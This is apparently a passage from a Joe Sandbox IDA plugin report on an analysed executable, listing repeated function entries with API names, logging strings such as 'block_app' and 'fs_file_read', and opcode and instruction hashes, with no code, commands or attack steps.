                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
                                    • Instruction ID: 1f4e9d906a808c3c4271ffd2917f3004748145dc50e6c04a0cb00b69462418ca
                                    • Opcode Fuzzy Hash: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
                                    • Instruction Fuzzy Hash: 50F0A250A8861281FA91A756E8113B5AE916F04BC0F944133DC5C6B7F4EF3CE9629323
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
                                    • Instruction ID: 6d35713eaf1300dfede9f45dbcba7532b3ddb9dc7712072026eaec6d1049ace7
                                    • Opcode Fuzzy Hash: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
                                    • Instruction Fuzzy Hash: 72F04492A88B0785FAE477169890378AE957F45B44FC04133C50EE62F5DE3CE454A322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
                                    • Instruction ID: 554469f5960aa8295999edea0c66cb767a06f9c0f26a2ebb98cce758b13e419a
                                    • Opcode Fuzzy Hash: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
                                    • Instruction Fuzzy Hash: 3DF06892A8CB0785FAE477169890378AF957F45B44FC04133C50EE62F5DE3CE450A322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
                                    • Instruction ID: f35962127b92292fd0309e3006ed505f131da67c4a88dcefaf10e1695487d190
                                    • Opcode Fuzzy Hash: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
                                    • Instruction Fuzzy Hash: 0CF06892A8CB0785FAE477169890378AF957F45B44FC04133C50EE62F5DE3CE450A322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
                                    • Instruction ID: 82f92313e368d4c37654cb5b8f4b7ae8b8d14fc38fe12ab79fa8a9075f97b787
                                    • Opcode Fuzzy Hash: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
                                    • Instruction Fuzzy Hash: E8F04492A8CB0785FAA477169890378AE95AF45B44FC04133C50EE62F5DE3CE550A322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
                                    • Instruction ID: 995cf1de078664b34d8bddaf57cda142673496a81ccd686097f05067b3a25e44
                                    • Opcode Fuzzy Hash: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
                                    • Instruction Fuzzy Hash: 22F06D14E89A0740E995BB96E8507B09E906F15780F885133C81C7A3F0EE7CE5658322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction ID: a0d46e0bb737ed5338424a1ca7d825dd37f1137a7f3b0ad90a50d8b28a0472b6
                                    • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction Fuzzy Hash: 2DF0B413B88A0311F9D2BA06B4507B99A411F80761E8907338D0C6A7E1ED3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction ID: b80da7a41bb85d097d010027fd1655213dfad704491142b105cbfff2e20cc45d
                                    • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction Fuzzy Hash: 8BF0B413B88A0311F9D2BA06B4407B99A412F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction ID: 510a1ee0f68f346dfe16cd05c9a8c47cff8248a8c1f24bf114f176afef6cee2c
                                    • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction Fuzzy Hash: 88F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction ID: 0203711ab5d3a2dff0a6725b8d3f146e9ae1c6e50c2f9408fba441e924679871
                                    • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction Fuzzy Hash: DEF0B413B88A0351F9D2BA06B4407B99A411F80761E890633CD0C6A7E0DE3CE893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction ID: 4274a45109ab0f2ed210680a8b7a95ada9642b17b0f07136d70c750a90bc0784
                                    • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction Fuzzy Hash: A3F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D1C6B7E1DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction ID: a0d46e0bb737ed5338424a1ca7d825dd37f1137a7f3b0ad90a50d8b28a0472b6
                                    • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction Fuzzy Hash: 2DF0B413B88A0311F9D2BA06B4507B99A411F80761E8907338D0C6A7E1ED3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction ID: b80da7a41bb85d097d010027fd1655213dfad704491142b105cbfff2e20cc45d
                                    • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction Fuzzy Hash: 8BF0B413B88A0311F9D2BA06B4407B99A412F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction ID: 510a1ee0f68f346dfe16cd05c9a8c47cff8248a8c1f24bf114f176afef6cee2c
                                    • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction Fuzzy Hash: 88F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction ID: 0203711ab5d3a2dff0a6725b8d3f146e9ae1c6e50c2f9408fba441e924679871
                                    • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction Fuzzy Hash: DEF0B413B88A0351F9D2BA06B4407B99A411F80761E890633CD0C6A7E0DE3CE893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction ID: 4274a45109ab0f2ed210680a8b7a95ada9642b17b0f07136d70c750a90bc0784
                                    • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction Fuzzy Hash: A3F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D1C6B7E1DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction ID: 4274a45109ab0f2ed210680a8b7a95ada9642b17b0f07136d70c750a90bc0784
                                    • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction Fuzzy Hash: A3F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D1C6B7E1DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction ID: a0d46e0bb737ed5338424a1ca7d825dd37f1137a7f3b0ad90a50d8b28a0472b6
